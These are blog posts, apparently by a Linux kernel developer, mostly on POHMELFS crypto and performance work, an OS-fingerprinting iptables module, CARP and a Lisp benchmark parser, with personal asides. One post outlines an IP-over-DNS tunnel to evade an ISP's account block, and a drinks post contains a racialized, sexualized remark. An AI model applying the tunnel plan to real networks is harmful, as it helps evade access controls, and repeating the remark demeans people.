not have any significant effect. Right now absinthe is allows in most of the countires,
where it was forbidden 200 years ago.
Eastern Europe used to drink various kinds of vodka, which are called in local manner.
For example so called Cha-Cha, which is quite strong (upto 80 degrees) drink, but usually
very clear, so it can be drunken without dilution.
The New World (most of it is from Mexico) brings us very interesting vodka-like drink
called tequila. It is frequently called mexican vodka, although US also produces own labels.
There are also types, which are made using french cogniak barrels.
Usually it is drunken with salt, lime (sometimes lemon) and
mulatto female. Process is very interesting: you lick mulatto's hip, cover it with salt,
lick it, get tequila shot and eat a lime portion. Even without mulatto it is still very
tasty drink. Tequila is made out of special agave sorts, the more it has, the higher
is quality.
One of the very known vodka-like drinks from Carribean is rum. It is also quite strong
drink, but because of its oil-like elements, it is more sweet and very tasty.
Rum is likely one of the most widely used strong drinks for coctails.
I know that Koreans also very like own kind of vodka, which has smaller spirit concentration,
namely 20 degrees. It is made out of rice.
It is very popular drink to be mixed with beer. Drives you roof away
just after couple of shots.
Ukrainians have very interesting drink called 'Gorilka', which is effectively
vodka with pepper. It is very tasty, but never eat Gorilka pepper, or you are
risking to get a peptic poisoning.
There is several vodka mixes.
First and likely the most known, is 'Screwdriver', whcih is vodka mixed with juise. It
is not very tasty imho. One of the most strong roof-driving-out drink is so called
'ruff' or mixture of vodka and beer. Do not try it if you do not know what it is.
I also know one vodka long drink: vodka with Martini mixed one to one. Although it looks
quite strong, it is very tasty drink with excellent sweet and a bit dry taste.
Using my small cellar I created (at least tried first time) another long drink,
which consists of vodka mixed with 'Malibu' rum. It is also possible to add there juice
or cold tea.
Meanwhile having a rest from various celebrations, I managed
to complete receiving multhreaded crypto processing
in POHMELFS.
So far it was only tested in debug environment (i.e. zillions
of logs and overall miserable performance), but it shows, that
different threads pick up the work, both on sending and receiving
directions.
There is a limitation though: the same crypto threads are used both
for receiving and transmit pathes, so it is possible to saturate them
all for example for receiving, so sending will stall. If there are
unsufficient crypto threads, waiting for RX crypto processing can take
too long, so watchdog transmit scanner will fire up and complete transactions
with errors. One can work this around by specifying big enough number of
crypto threads or long enough transaction scanning timeout, both are provided
via mount option.
I would like to test it in more production-like environment and perform various
stresses on it, but I'm far from my working place, so can not do it right now.
Which means release will be postponed for tomorrow (if testing will not show
regressions or bugs).
This will not be last feature release though: for example POHMELFS does not support
extended attributes and ACLs, there is no header checksum (although there is a reserved
32-but field) there may be some features in different areas too,
but I do not hurry to implement them, since I need something to put into future
POHMELFS changelogs. I think sending the same kernel patch with different words
about userspace server changes is not the way to go, so there should be some kernel
changes too :)
I will draw up some design notes on how I plan to implement POHMELFS server, and namely
how distributed facilities will be done, so far I have quite clear picture in mind,
but it needs to be worked out 'on paper' to find rough corners.
- Shit! There are no more M8 screw-nuts.
- What? Use M12, bozon should pass through.
- We all will be fucked this Monday!
Good night. Actually as a former physicist I can say,
that at least two out of four killing theories are really
stupid, but nevertheless its interesting!
I implemented pool of crypto processing threads (number of them
is mount option parameter), each of which has pool of pages to
encrypt data into, so crypto thread is not released until server
returns acknowledge that data was successfully written, so one
should tune number of threads and page pool (number of pages
in each thread is maximum number of pages per transaction,
this limit has own mount option too) according to desired behaviour.
Testing shows that writing performance was reduced with this approach
noticebly: with 4 encryption threads and 4 receiving thread in server
perfromance dropped by around 30% from 65+ MB/s down to 46+ MB/s,
but I think it can be improved with larger number of encryption threads.
During iozone write/rewrite test each of 4 crypto threads ate about 20-30%
of CPU, while server ate about 130% (4 threads totally). In all previous iozone tests
the larger number of userspace was used, the worse results were
(this is somewhat expected, since iozone is singlethreaded benchmark,
so larger number of threads lead only to performance degradation),
so I will test different setups (namely larger number of crypto threads
and smaller number of server threads).
But this behaviour is not a problem, and I expect it to be tuned, real
problem is reading performance. Right now there is only single thread,
which reads from one socket: it was done intentionally, since reading
data from socket is longer operation than searching page in radix tree
or any other operation performed by that thread, so there is no way
to saturate its capabilities. Until we start encryption, which is slow,
so any subsequent data reading from the socket can not be done in parallel
with crypto processing, and overall reading performance drops to ground.
This problem has to be fixed, so I plan to use the same crypto
processing threads to decrypt and/or perform hash check for received data
and push it up to the VFS stack.
First,
POHMELFS
does need to have encryption. Because I plan to use
distributed hash table approach in server (well, consider POHMELFS
kernel client as a kind of bittorrent filesystem client), and as in any
non-centralized system, content transferred via uncontrolled data channels
has to be encrypted.
But... I'm incredibly stupid: I implemented encryption and decryption in place,
i.e. VFS page is being encrypted prior to be written to the servers, so
subsequent reading leads to... Yes, it reads encrypted content.
To fix this issue I plan to encrypt data into different pages and send them,
leaving VFS ones as is. There are two approaches I consider:
allocate and send pages at writeback time - we want to send 5 pages, so allocate
5 pages, encrypt data into them and broadcast them to all needed servers.
allocate (potentially large) pool of pages at mount time per crypto thread
and encrypt data into them. This will have about zero run-time overhead for VFS,
except slightly delayed because of encryption write completion.
I frequently hear that whatever server you implement, it has to
be non-blocking, since in case of parallel sending it allows to
send multiple requests to fast servers, while not-sending data to
slow server, since non-blocking socket will return EAGAIN.
This is only half-right solution: when we have to put given data to
all servers, and can not free it until all servers replied with acknowledge,
non-blocking mode can bring more damage than gain.
Mainly because it
allows to eat all the memory for requests, which are still in the queue
to be sent to slow server, and which was already sent to fast ones.
In this case higher-level application (consider simple application which generates
some data and writes it into the file in distributed filesystem, which writes
file to several servers) will never block since transfer
to fast servers completes quickly, and will provide more and more data,
which will consume all RAM.
It is possible to deadlock system in this case,
since to send some data to remote server we always have to allocate at least some
data to put network headers into. With non-blocking solution we will consume
all memory and kick itself into the coma.
I've updated OSF
modules to xtables, so you have to enable its support in kernel config and get
recent iptables (I tested with 1.4.1.1, which is the latest release to date).
OSF allows you to match incoming packets by different sets of SYN-packet and determine,
which remote system is on the remote end, so you can make decisions based on OS type
and even version at some degreee.
Installation instruction, example and source code can be found on
homepage.
I've also sent it to netfilter-devel@ and netdev@ maillists, since my previous mails never appeared
there likely because of spam filters.
Rumor number one. SWsoft
aka Parallels actively searches for Linux kernel hackers in
lead Moscow universities, namely MSU and MIPT. I saw theirs
posters, where among other (wanted) requirements there is
distributed filesystem knowledge.
Rumor number two. Alexey Kuznetsov (if you do not know,
its the guy who wrote major part of linux network stack,
namely TCP/UDP/IP and socket implementations, and although
there was lots of changes in the stack since then, I think it will not
be an exaggeration to call him the author), who also worked
on Virtuozzo and OpenVZ (and its interesting VFS parts, which
AFAICS are not in kernel, maybe yet), so he works on some
filesystem too. The last time we 'confronted' was couple
of years ago, when I first time implemented
netchannels
and tried to convince network community (and namely Alexey Kuznetsov
and David Miller)
that netchannel idea worth further investigation and implementation.
IIRC I did not succeed, although results were very
impressive.
Let's see what will happen with filesystems :)
Rumor number three. SWsoft recently started to actively search
for kernel hacker for 'new interesting open source project'. They
always searched for kernel programmers, but never told anything
about projects, now something changed.
Rumor number four. OpenVZ and Virtuozzo have serious problems with NFS
(especially when server dies), probably because of very ugly NFS protocol
(yes it is), so its hard to properly virtualize it (or not?). There are
no alternatives for NFS right now in major productions, but you all know about
POHMELFS
which right now can be used as really good replacement.
Rumor number five. SWsoft has long history of PHD defences (at least in MIPT) based on
theoretical FS called TorFS (namely Tormasov FileSystem), year ago it was still
not very alive project in practice,
but I heard that it was very impressive in theory. This rumor exists
really many years.
So, I have a quite clear picture, that SWsoft started development of the new
distributed filesystem, which is aimed at first to replace NFS in virtualized
environments. I can also imagine very interesting distributed parallel facilities
needed for virtualized systems. And they try to attract lots of people to the
project as long as really heavy artillery like Alexey Kuznetsov.
Which basically means, that sooner or later my development will meet strong
concurency from this company, which has lots of really good professionals.
And that's very interesting and cool :)
P.S. or it may be a complete bullshit and delirium of my fevered consciousness.
And one fact about
POHMELFS:
today I finished client support for padded crypto processing of all requests
and started to work out server bits, I expect to finish it in a day or around,
so new release is very close.
It was really interesting. Although it is very simple student
model, a friend produced very good sounds. He did not practice
many years already, but nevertheless it was not that bad.
My everyday half to hour exercises usually produce worse sound, although
sometimes I do find really cool notes. Unfortunately I still do not
know some magic bit about how to catch on that sound, it borns and
dissapears on its own, but I'm sure I will find it, and I think I'm close
to where it hides :)
1. Because of encryption problem - data to be encrypted has to be
blocksize aligned, so some informaion about padding has to
be added into network command as long as crypto data size.
2. IV generation. I decided to extend network command and put there
64 bit IV for given packet. using simple sequence number is enough
to protect against repeat message attack.
3. Encryption/hashing data. I decided not to ecnrypt/hash network headers,
and only do it for transmitted data. If transaction contains several
commands, data for all commands will be encrypted/hashed, in case of hash,
signle digest/hmac will be generated and placed into transaction header.
4. It is possible, that I will add strong header checksum, which will be generated
only for header and placed into special field. It will be calculated
assuming checksum field is zero. This step is optional so far, but network header
has 32 reserved bits, which can be used for it.
Right now hashing and encryption work, but are not checked on server (although generated),
because of crypto alignment ugliness I decided to rethink approach a bit.
Evolution process in action...
That was really suck - yes, we played bad. Just like it was before.
It is not somewhat surprising.
But what was the fucking ubnormal week ago agains Holland? That
was new, was cool, was bloody great, but not today. Tired or whatever...
What's the difference right now, we lose.
Yes, Spain played really good, my congratulations.
But our command showed, that it is possible.
That there is nothing impossible.
We can, when we want. You can, when you want.
POHMELFS server is able to handshake hash/cipher names and operation
modes, to initialize appropriate algorithms and perfrom basic operations
(like more generic hash_update() instead of different
functions with different arguments used to hash data depending on operation mode,
either simple digest or hmac: EVP_DigestUpdate()/HMAC_Update().
I'm working on the right way of doing crypto processing, since how it is done right now is a bit hairy,
i.e. without serious changes in the code.
I already hate OpenSSL API: EVP_get_cipherbyname(), EVP_MD_CTX, EVP_DigestFinal_ex().
It looks like above functions were written by three different persons and they
never actually talked to each other about how to make them look similar... But it is
a minor issue of course.
So, when things are settled down, I will make a new release, likely it will see the light this week.
My ISP again blocked my account and can not unblock it although there
are money on the deposit. There are serious problems in its billing
system which requires manual intervention of the operator. Unfortunately
it is a real challenge to call them, it already took more than half of a hour
yesterday, and without success.
So, I decided to implement an interesting idea on how to bypass its blocking.
It is based on the security 'hole' in its (and I think vast majority
of ISPs do the same) DNS configuration, which allows
to request any DNS record even if account is blocked. It will be fetched from
remote DNS server if there are no records in the IPSs cache.
Thus attack vector becomes visible: implement IP over DNS tunnel network device
and setup local routing to use it by default. One has to control at least one
remote machine which hosts DNS records for given domain name, since it is required
to parse incoming DNS requests and process them accordingly.
There are at least two known IP over DNS tunnel solutions:
NSTX
(howto) and
OzymanDNS
(howto). Both solutions require that you own one or another
server to run ip-over-dns tunnel server on it.
Unfortunately I have only single machine with static IP address, which is not protected
by lots of firewalls and allows incoming connections.
The simplest solution for this problem is to create iptables input target rule
for the server, which will parse incoming DNS requests and redirect usual queries up
the network stack to the userspace server, and handle 'poisoned' queries as tunnel.
Client can be TUN/TAP based, but can also be a tunnel network device.
I believe the more weird it looks, the more interesting it is, so likely will think
more about kernel based tunnels.
DNS queries are limited enough not to allow binary data (IIRC,
the most interesting is DNS TXT records), but it can be appropriately
encoded and enciphered. So, will put it into
todo list.
I even think that it is not that bad idea to have such modules in kernel :)
But testing can not be done without appropriate server support, which
is now the main task. POHMELFS uses lazy crypto engine - each network state
(it represents connection between client and one server) contains
number of fields used exclusively for semi-lockless input data processing
(it locks state when performs actual reading, but does not
hold that lock when processing incoming messages, since it is the only
path, which receives data), now it also has crypto information about
how to manage reply messages (they include read page reply for example),
so it does not queue work to be done by crypto threads, but does that itself
instead. It may or may not be the bottleneck of the input path, tests will
provide facts, so far I do not have plans to change it, but it can be done
of course if performance will suck.
After I finish crypto processing in both client (it has been written, but requires lots
of testing with server) and server (just have started to recall how to work with
OpenSSL. Well, I've read how HMAC works in OpenSSL, found it to be simple enough
and then started to read how to parse binary data in LISP :)
But anything which is interesting for me now, ends up in good results for all other
projects), I will switch to something different for a while.
Some voices in the brain ask to be spread it in lots of interesting directions :)
I've ran read/reread and write/rewrite tests as described
in previous run,
now with HMAC(SHA1) of all outgoing transactions (note, that reading response data is not yet
encrypted and does not contain digital signature, server also does not support neither operation),
essentially only writing should be affected by this, but I also ran reading tests for compelteness.
Results show zero performance overhead of the full data SHA1 hashing, but note that quite fast
machines were used (2 3Ghz Xeons (2 physical and 2 logical CPUs, HT enabled) with 1 GB of RAM). All the time only
two crypto threads were actively hashing data, since there are only two pdflush threads on this machine.
Writing is even faster with hashing, but results drifted around, so essentially performance is the same.
I've just known, that it is impossible to map the same page
twice: for example first time using kmap()/kunmap()
and second one via kmap_atomic()/kunmap_atomic().
Although mechanisms are a bit different in both mappings, it is
forbidden to do and system will panic like this:
This happend for exacly above case, when page was first mapped via
kmap() in POHMELFS and then via
kmap_atomic() in HMAC crypto processing code.
I wonder what will happen if we ever try to send kmapped pages
over IPsec tunnel. Likely it will ooops too...
This can happen for example when pages are mapped in
tcp_sendpage() when calling sendfile()
over the interface, which does not support hardware checksumming
and scater-gather: mapped pages are pushed down the network stack
where they will be eventually encrypted/hashed in IPsec, which
will in turn call kmap_atomic().
So, if you will find obscure oops in kmap_atomic()
and friends, first check that calling stack did not map page
earlier.
So far it only includes encryption and hash calculation for outgoing
transactions. System has (mount option) number of threads per superblock,
which are responsible for encryption/hashing (each thread has own crypto structure,
so there are no additional allocations in the fast path, although I think
they would not harm performance since should be small enough
fraction on top of crypto processing overhead) and subsequent data sending,
so original caller (like writeback/readahead code) will not block if there
are ready threads, otherwise it will wait until some thread finishes its current crypto work.
I decided to implement kind of continuation for such transactions, when network sending
code (which is supposed to be started after crypto processing) will be invoked from those threads,
which performed crypto operations, and not returning back to originall caller context.
For massively multiqueue NICs that should be a benefit, but so far I did not test its performance.
Next step is receiving crypto support and userspace changes.
If I did not miss something,
GNU TLS (I never worked with it)
supports very limited amount of ciphers and hashes, so it is not appropriate for
filesystem data protection layer.
According to its
documentation
GNU TLS only supports AES, RC4 and 3DES ciphers and SHA1 and MD5 hashes. There is also only CBC
chaining mode and several hash/cipher schemes.
So, POHMELFS server will use OpenSSL for data protection. Sooner or later OpenSSL
will get hardware crypto support on Linux too (well, Linux crypto stack should first
implement userspace API, which does not exist yet, although there is a
work
by Loc Ho from AMCC to add such support).
So far I decided to implement following protection scheme: checksumm or encryption
will cover full transaction data, but will be applied by chunks:
Transaction 'first-level' data, i.e. header and data immediately placed after transaction
header. For all commands except page writing it will be finish.
For write pages command, each header is generated dynamically and does not exist
until data is really being sent, so crypto code will run over all pages and update checksum
processing headers and data pages separately. Checkum update should be simple enough, since
there are crypto helpers to update and finalize checksum, but encryption is more complex:
I requires all chunks to be setup in advance in single scatterlist chain, with dynamic header
generation it is too big overhead (it requires not only scatterlist allocation, but also
header allocation just for encryption), so encryption will be done separately for headers and pages,
and I will have to create some IV propagation scheme (like last bytes of previous unencrypted chunk
will become IV for the next chunk, or something like that). I understand, that it may be not very
secure approach though.
Reading data back from server is simpler, since there are no transactions,
and data will be encrypted/checksummed like in the first step above. It is possible, that it will
force to increase network header structure a bit (32 or 16 bits to store size of the attached checksumm).
It is fucking unbelivable, but Russia plays with Holland
and score is 1:1. Not only its equal, we do play a cool football!
And Holland equaled score in a 87 minute, we were so close, but
it is not yet stopped. We can win. We will win!
I do not understand, how in the hell our team started to play that
good, we can. We fucking can, when we want. We play not for the goal, not
for the money, not for fucking anyhintg, we play just for the game.
And game wins!
Ended first half of the additional time. Russia vs Holland 1:1.
We can. Just because we can.
As I found with
distributed storage
project, any communication channels, which involve huge amount of data transfers,
have to have additional strong checksum embedded in the protocol, since TCP one is not
enough in some cases. There are some options, like TCP MD5 signatures or IPsec transformations,
but it is not always available.
POHMELFS
will include ability to both encrypt whole data channel and/or only digitally
sign all messages. This will be implemented on transaction level, so no higher layer code
(like reading/writing data functions) will ever be affected.
POHMELFS will also have mount time self-configuration, i.e. client will send to server
information about supported capabilities, requested by administrator, and if server does not
support some of them (for example it can only do HMAC and not encryption, and both operations were
requested at mount time), they will be dropped (and mount failed optionally).
In the future it will be possible to extend it with additional flags if needed.
mount is not very convenient command to transfer crypto information (like binary keys)
to kernel, so I use the same infrastructure as initial server group initialization (i.e. using
POHMELFS existing configuration utility).
Support for HMAC and encryption will force server to depend on OpenSSL,
but I do not think it is a problem. In some future time I can write autoconfiguration, which will
allow to compile server without crypto support (and thus do not accept encrypted clients and
do not check signatures) if there is no OpenSSL.
After crypto operations are implemented (I expect it to be finished this week), I will release as promised
new netchannel
version (and will remove unneded functionality like NAT), and add some interesting bits (like async
processing) into distributed storage,
so expect its new release soon too.
Excellent documentation with examples.
I expect that it is implementation (i.e. CLISP) specific and will not work with SBCL or Allegro
for example, but nevertheless I want to learn and somewhat use it.
If it will be good for my usage cases, what my next userspace server will be written with? :)
Hardware used in testing: 4-way Intel E7520 system (two logical and two physical CPUs)
3Ghz 32 bit Xeons with 1gb of ram, Adaptec AIC7902 Ultra320 SCSI adapter with SEAGATE
ST3300007LC 10k rpm 300 Gb testing disk. Its linear reading speed is about 90 MB/s.
Software used in testing: 2.6.25 kernels (on server and client), in-kernel async NFS server,
userspace POHMELFS server.
Tests were performed with 8gb files (amount of ram was reduced to 1gb to eliminate caching
influence) with different (from 8 to 1024 KB) record size. I ran write/rewrite, read/reread and
random read and write tests.
Zach Brown has
committed
cache coherency support into CRFS repository.
Cache coherency protocol works by broadcasting special messages from
server, and each client invalidates appropriate inodes (and dentries if needed)
before sending back a reply. POHMELFS
uses a bit different mechanism: client does not send acks back to server,
so all such messages are kind of advisory-only, but I did not yet complete (well,
I did not even think about this problem this week) locking design, so it can change.
Main problem with sync cache coherency support is its absolute non-scalability.
While number of sage cases might require such behaviour, I expect that if not major,
but noticeble part of users do not want perfromance degradation as a price for
posix-like coherency expectation. This approach is worse that write-through cache,
since there is whole round-trip of the cache coherency request instead of just
data sending during its writing. Single direction sending is faster than sending+waiting,
so for me it is still a questionable approach.
I will think a lot of this problem later this week(end), so that solution would
satisfy both high-perfomance and safety camps (although at some degree only I think).
(defmacro with-output-dir ((out pos dir flags) &body form)
`(let ((,pos 2))
(dolist (operation (nthcdr 2 *iozone-tests*))
(let* ((dir (pathname-as-directory dir))
(output-file (make-pathname
:directory (pathname-directory ,dir)
:name operation
:type "gnuplot")))
(with-open-file (,out output-file :direction :output :if-exists ,flags)
,@form))
(incf pos))))
(defun write-gnuplot-headers (dir)
(with-output-dir (out pos dir :supersede)
(format out "set title \"Iozone performance: ~a, KB/s\"~%" operation)
(format out "set terminal png small size 450 350~%")
(format out "set logscale x~%")
(format out "set xlabel \"Record size in KBytes\"~%")
(format out "set ylabel \"Kbytes/sec\"~%")
(format out "set output \"~a.png\"~%" (elt *iozone-tests* pos))
(format out "plot ")))
(defun update-gnuplot-headers (dir file)
(with-output-dir (out pos dir :append)
(unless *first-file-p*
(format out ", "))
(let* ((fstype (pathname-name file))
(name (make-output-name file)))
(format out "\"~a\" using 1:~d title \"~a\" with lines" name (1+ pos) fstype))))
Macros are really the coolest feature of the LISP. Now I believe I started to understand LISP kung-fu.
Iozone parser is essentially ready. I was a bit pessimistic yesterday: it took only half of the day and several
hours today, and code itself is rather ugly (and frequently really ugly, likely far from the LISP way), but it works:
it runs over given dir, searches there for files with given extensions, parses them (removes unneded iozone information),
writes result to specified directory. Also runs over iozone test strings and generate gnuplot scripts for them, which
will build a graph based on filesystem info it gathered traversing the tree above, so results looks like this:
$ ./parser.lisp
Processing: /tmp/iozone/tmpfs/nfs.out ... done
Processing: /tmp/iozone/tmpfs/pohmelfs.out ... done
$ cat /tmp/iozone/tmpfs/out/read.gnuplot
set title "Iozone performance: read, KB/s"
set terminal png small size 450 350
set logscale x
set xlabel "Record size in KBytes"
set ylabel "Kbytes/sec"
set output "read.png"
plot "/tmp/iozone/tmpfs/nfs.out.data" using 1:5 title "nfs" with lines,
"/tmp/iozone/tmpfs/pohmelfs.out.data" using 1:5 title "pohmelfs" with lines
(defun string_to_list (str)
(let ((num 0) (ret '()) (string_len (length str)))
(dotimes (i string_len)
(let ((sym (elt str i)))
(cond
((not (char-number-p sym))
(unless (eql num 0)
;(format t ": ~d~%" num)
(push num ret)
(setf num 0)))
(t (setf num (+ (* num 10) (to_number sym)))
(when (eql i (- string_len 1))
(push num ret))))))
(nreverse ret)))
Which is a part of my LISP parser for iozone output files. So far it is able to convert its output numbers (performance in KB/sec)
into LISP lists (one list per record), so single line of iozone output becomes a single list of numbers
(ugh, I was forced to write string-to-number conversion function).
It is not that serious achievement likely, and it took the whole day, but nevertheless I like it,
although I would write the same in C much faster :)
Main problem with Lisp for me is its functional-conditioning system. Converted to C it looks like:
if (a) {
if (b) {
if (c) {
do_stuff()
}
}
}
While I would write:
if (!a)
return;
if (!b)
return;
if (!c)
return;
do_stuff()
So far I did not use macros at all, and all the time looked into
Practical Common Lisp book
(and frankly got from there directory processing functions, although
modified it a bit), but what would you expect from the first project. Tomorrow I will extend it to
write gnuplot-compatible file and finally generate some graphs (I do not know
how to call external programms from LISP though).
Frankly, I'm not yet excited about how cool LISP is, but I like it, since it is different.
Just like I like my neverendingappartment development process.
Ugh, and with proper automatic vim highlightning I am not afraid of parenthesis.
Interested reader can grab my sources
and comment on ugliness.
Decided to work on completely different than usual
area today, so neverending appartment development.
Today I painted whole ceiling in the kitched and I want to belive,
that it is the last time. It was not that quick, but took noticebly smaller
amount of day.
Main task was floor in the hall. I finially covered it with ceramic granite.
It was supposed to be seamless granite installation, but... tiles have so precise
dimensions, that difference between them was never more than half of santimeter
in each side, so I was forced to make small seams and move tiles around quite
for a while before they formed somewhat straight lines, although there are
lots of non-straight crosses.
Nevertheless it looks cool, I'm glad I finished this part.
Ever dreamt to block all Linux users in your network from accessing
internet and allow full bandwidth to Windows worm? We have to care about
our smaller brothers, so this iptables extension module allows you to do
so.
OSF stands for OS Fingerprint allows you to build usual iptables
decision on incoming TCP packets, only initial handhsake containing SYN
bit is enough to understand what remote OS is. Original idea belongs to
Michal Zalewski.
This iptables module was
imlemented almost 5 years ago and lived in patch-o-matic (userspace
library is still there) iptables tree. Now I've updated it to Xtables
and send for review.
Installation steps are described on the
homepage,
but are trivial and include usual make/make lib building and loading rules into the module
via procfs file.
Fixed bug found by Salvatore Del Popolo (delpopolo_dit.unitn.it)
in TCP implementation, when system checked sending window and determined,
that packet was not allowed to be sent and nevertheless tried to do so in some
cases.
Userspace network stack
is a very fast (if working on top of
netchannels,
also supported packet socket) and very small network stack (TCP/UDP/IP/ethernet) implemeneted
entirely in userspace. Because of it lives near the very the end of the peer (i.e. very close
or even embedded into application), it allows much faster processing of some workloads, namely
small packet sending and receiving, where
itoutperforms
vanilla Linux TCP/IP stack 3 times in performance and 4 times CPU usage (sending and receiving vary).
Comapre netchannels+unetstack versus Linux sockets (2006 year numbers).
It is not about problems in the Linux stack, but overhead of syscalls, which are in turn
results of too separate data sending and reply processing in the existing model.
I've finally made a new release of the
CARP
for Linux kernel.
CARP is an improved version of the Virtual Router Redundancy Protocol (VRRP) standard.
The latest protocol to help provide high availability and network redundancy, it was
developed because router giant Cisco Systems believes that its Hot Standby Router
Protocol (HSRP) patent covers some of the same technical areas as VRRP.
This project allows you to build high-available clusters of multiple machines with
balanced master selection between them. Installation and setup are pretty trivial:
$ tar -zxf carp_latest.tar.gz
$ cd carp
$ make
# insmod ip_carp.ko
# modprobe cn
# insmod carp_conn.ko
# ifconfig carp0 up
# carp_conn_daemon -m master.sh -b backup.sh
And the same on all other machines.
Each script as you got from its name is executed when node becomes master or backup one,
you can put there firewall rule changes, traffic shaping setup, network daemon start/stop
scripts and whatever you like.
Its main advantage over any other existing open (well, it behaves much more robust than Cisco VRRP though)
master/backup solutions (like Hearbeat or userspace CARP) is ability to setup multicast address (via usual
/sbin/ifconfig command) and thus do not confuse some crappyCisco
hardware, which will not understand that node changed.
One can get the latest sources from CARP homepage.
Enjoy!
POHMELFS write speed about 10% faster, read speed 3-3.5 times faster
(essentially disk/local fs IO limit, see below).
POHMELFS random read speed is smaller, and that is task with the highest priority now,
especially compared to local FS results.POHMELFS random write is slightly faster than NFS.
For comparison, local filesystem, used for tests. mkfs.xfs -d agcount=75 -l size=64m /dev/sdc1;
mount -o logbufs=8,nobarrier,noatime,nodiratime,osyncisdsync /dev/sdc1 /mnt/:
Write requests are sent to multiple servers and completed only when all of them sent an ack.
Ability to add and/or remove servers from working set at run-time from userspace (via netlink,
so the same command can be processed from real network though, but since server does not support it
yet, I dropped network part).
Documentation (overall view and protocol commands)!
Rename command (oops, forgot it in previous releases :)
Several new mount options to control client behaviour instead of hardcoded numbers.
Bug fixes.
I will complete documentation in a few moments and send this release to the mail lists.
Very likely it is last non-bug-fixing release of the kernel client side, next release will incorporate
features, needed for distributed parallel data processing (like ability to add new servers via network
command from another servers), so most of the work will be devoted to server code.
Essnetially that's it, I belive really most of the features I wanted
from network distributed parallel filesystem, which should live
in client, are already implemented in POHMELFS.
Client has following (if did not forget something interesting,
listed only interesting from parallel point of view) features:
Automatic failover reconnect to the same server.
Run-time addition/removal of the servers from the working set
(only via userspace command, since server does not support that yet,
but addition is trivial).
Transactions support. Full failover for all operations. Resending transactions to different servers on timeout or error.
Load balancing of reading (directory reading and lookups inclusive) requests and
simultaneous writing to all servers in current working set.
It is damn fast (but remember, that random reading
is no yet optimal enough, and in
the last tests it was slower NFS).
Userspace server meantime does not support lots of features it has to support
to be called complete parallel distributed solution, and main work should now
be concentrated on it.
Main missing (and the most complex) features are:
Distributed data coherency protocol like PAXOS for server data, stored on multiple machines.
Ability to mirror data itself on multiple machines.
So, likely release will see the light tomorrow or Friday.
And yes, very likely Linux kernel community lost me (and I do believe
none cares as long as me).
But not Linux kernel, it is definitely the place I like.
People, who want to hack on Linux kernel will do that without all
that empty talks and brilliant ideas, all of which are only aimed in
a single direction: do what we will ask you to do for us. Be fair and
admit that you do not want new ideas implemented, you want old bugs (introduced
by someone else) fixed only, so that kernel got more respect without
possible additional work for you.
It is not how interested people work, instead they just decide themself
how and what to do. That's why kernel janitor project did not succeed:
it is not interesting for anyone. The same applies to its refocus to bugfixes.
And I do know what is kernel janitorial: I started with that not long time ago: fixed
trivial error checks like request_region()/check_region() code
and other minor things like PCI remap errors.
That was hell of crap. Frequently there was a situation,
when I fixed lots (like 20 or more) drivers in one go and submitted a patch,
instead I was asked to split it to separate patches, to add each driver maintainer
into the copy, wait for theirs ACK, resubmit and so on. And frequently happend
(especially when new feature was introduced and lot of small code has to be changed
a little), that while I did that, some other known kernel hacker did the same, and his
patch was immediately applied.
Janitorial and all hypocrisy about 'we want more developers' just suck.
My advice for those who really want to hack on kernel: just do what you like,
try yourself in whatever subsystem you want, implement your ideas, be creative and do
whatever you like with kernel and not what all those kernel heads tell you to do.
The only way to succeed is to move forward!
Argh, and do not listen for any such kind of advices at all :)
POHMELFS
got ability to add/remove servers in run-time (although not via network command,
since I do not know, how to test it yet), but via netlink interface. The same
message can be passed via network though, so it will be simple to extend.
Also, POHMELFS got readahead support via ->readpages()
callback. I removed AIO reading from POHMELFS in favour of readahead
and got excellent result in sequential reading: 3-3.5 times faster than NFS
and essentially reaching disk IO bandwidth (a bit less though),
but random reading dropped to miserable numbers.
Also rewritten reading method should provide better balanced between multiple servers
capabilities for the system, but it will not show any benefit in single-threaded
iozone benchmark, since it reads data via single call to read(),
which gets sequential data access, which in turn is faster than network bandwidth.
So multithreaded load should greatly benefit from read balancing, but I did not
yet test that.
I ran sequential read/reread, write/rewrite and random read/write tests for
XFS, Ext4, NFS (over XFS) and POHMELFS (over XFS) with 1Gb of RAM and 8Gb
of test files (to eliminate VFS caching influence) with 8Kb to 1Mb record size.
Results exist in text files in standard iozone output format, but since I'm learning
LISP I decided to write a graph generator (via gnuplot) using my very basic
knowledge of this language, so nice graph results can take a while...
Also, tomorrow morning I will flight away to my friends marriage and will only
return monday 9. I will not have internet access there, only lots of fun.
Now they eat less memory, and single writing transaction can accumulate
up to 1024 pages. This can be further tuned especially for small requests
mixed with sync. Currently writing transaction is allocated for its maximum
size, and then pages pointers are written to the allocated area, so
if number of dirty pages requiring writeback is small, quite lots of
space will be wasted.
It is a task for the next optimization, nevertheless currently sequential
writing is only limited by disk throughput or network bandwidth in case of
multiple servers, since link
is shared between machines, so effective bandwidth becomes equal
to GigE/number of servers, or about 60 MB/s in my environment with two servers
and single client.
Also, reading path was not changed at all (only transaction
internals) - there is still no readahead
and new transaction is allocated for each page to be read. Nevertheless,
see how reading was improved: POHMELFS not only outperformed NFS again,
but reached disk bandwidth limit already for 16Kb requsts (almost two
times faster than NFS). Table shows IO throughput in KB/s.
I will create nice graphs out of this tables and also will include
optimized reading tests (tomorrow likely) and two data server results.
What also should be done, is testing with either bigger files or smaller
amount of ram and thus smaller VFS cache size. As you saw in all tests, when
lots of reads start to hit the cache, picture becomes completely non-informative
for filesystem behaviour. So I want to limit all three testing machines
to 1Gb of RAM (booting with mem=1G parameter) and perform the same iozone
bench for 8Gb file. Results should be more realistic.
In parallel I will implement userspace run-time server addition/removal
command, which will also be used as-is for network message from one
or another server, connected before. With optimized reading transactions
it will be a good ground for the next POHMELFS release. So I plan to schedule
it to thursday or middle of the next week, since I will be on small vacation
jun 6-9.
- So again, can you offer an alternative?
- Just give up on this dumb idea completely.
It is not about AppArmor in general (although maybe about it too), but about security hooks which provide
path information into inode callbacks. There are pros and cons for this decision,
but things look like path based security hooks will not be accepted.
There is a really trivial way to fix it. No kidding, it is simple: create own
name cache and do not bind it to dentries, but instead index it by inode number.
This allows you to have whatever you want callbacks and information in stricktly
bound VFS operations. Need to have path info in ->inode_create()?
Put it into own tree indexed by inode number for parent inode, lookup that data in
security hook and make a decision. Yes, it is slower, but active security was never
a fast solution. It is still against the rules others created for security based
systems, but still formally it in the all boundaries of the created (maybe ugly
for someone) interfaces.
And I will not point to project, which already uses such approach in different area
though :)
It is interesting to implement your ideas not by breaking something (although sometimes
it is need, but that's likely an exeption or when you are hacking deeply internal kernel
part), but instead by hacking around existing limitations.
I think I found a way to have a progress in my trumpet playing exercises
(read: ear scratching screaming, it sounds much worse than wrong note on piano).
